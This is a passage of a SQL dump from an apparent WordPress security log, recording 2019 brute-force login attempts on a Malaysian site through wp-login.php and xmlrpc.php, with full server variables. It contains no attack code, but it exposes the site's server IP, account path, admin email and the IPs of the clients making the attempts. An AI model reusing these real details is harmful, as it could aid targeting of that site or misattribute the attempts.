21:00:10','2019-09-16 21:00:08',18259024,19559096,'https://bintara.com.my/xmlrpc.php',1,0,'188.254.18.110'),(24266,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.254.18.110\";s:11:\"REMOTE_PORT\";s:5:\"47556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-31NK-omY048@iBsMV1AAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568667605.0035\";s:12:\"REQUEST_TIME\";s:10:\"1568667605\";}}','notice','2019-09-16 21:00:06','2019-09-16 21:00:05',17741712,19232072,'https://bintara.com.my/wp-login.php',1,0,'188.254.18.110'),(24265,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"43022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-2GmShanGhHYaqyCTEoQAAAAo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568667162.546\";s:12:\"REQUEST_TIME\";s:10:\"1568667162\";}}','notice','2019-09-16 20:52:43','2019-09-16 20:52:42',18259048,19558128,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(24264,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"42474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-2FtK-omY048@iBsMVCwAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568667158.9456\";s:12:\"REQUEST_TIME\";s:10:\"1568667158\";}}','notice','2019-09-16 20:52:41','2019-09-16 20:52:39',17909928,19233528,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24263,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"42474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-2FtK-omY048@iBsMVCwAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568667158.9456\";s:12:\"REQUEST_TIME\";s:10:\"1568667158\";}}','notice','2019-09-16 20:52:40','2019-09-16 20:52:39',17747824,19233528,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24262,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"62314\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-wamShanGhHYaqyCS@zAAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568665706.1669\";s:12:\"REQUEST_TIME\";s:10:\"1568665706\";}}','notice','2019-09-16 20:28:27','2019-09-16 20:28:26',18259736,19556480,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(24261,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.153.203\";s:11:\"REMOTE_PORT\";s:5:\"51808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-wZ2ShanGhHYaqyCS@yQAAAAA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568665703.529\";s:12:\"REQUEST_TIME\";s:10:\"1568665703\";}}','notice','2019-09-16 20:28:24','2019-09-16 20:28:23',18257864,19557240,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.153.203'),(24260,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"61846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-wZmkPXSyJlCUJQmoloAAAAYM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568665703.0696\";s:12:\"REQUEST_TIME\";s:10:\"1568665703\";}}','notice','2019-09-16 20:28:24','2019-09-16 20:28:23',17742024,19233288,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(24259,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.153.203\";s:11:\"REMOTE_PORT\";s:5:\"50808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-wYmShanGhHYaqyCS@wwAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568665698.4247\";s:12:\"REQUEST_TIME\";s:10:\"1568665698\";}}','notice','2019-09-16 20:28:19','2019-09-16 20:28:18',17742016,19233536,'https://bintara.com.my/wp-login.php',1,0,'157.230.153.203'),(24258,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.227.128.241\";s:11:\"REMOTE_PORT\";s:5:\"47600\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-ud2ShanGhHYaqyCS88gAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568665207.8607\";s:12:\"REQUEST_TIME\";s:10:\"1568665207\";}}','notice','2019-09-16 20:20:09','2019-09-16 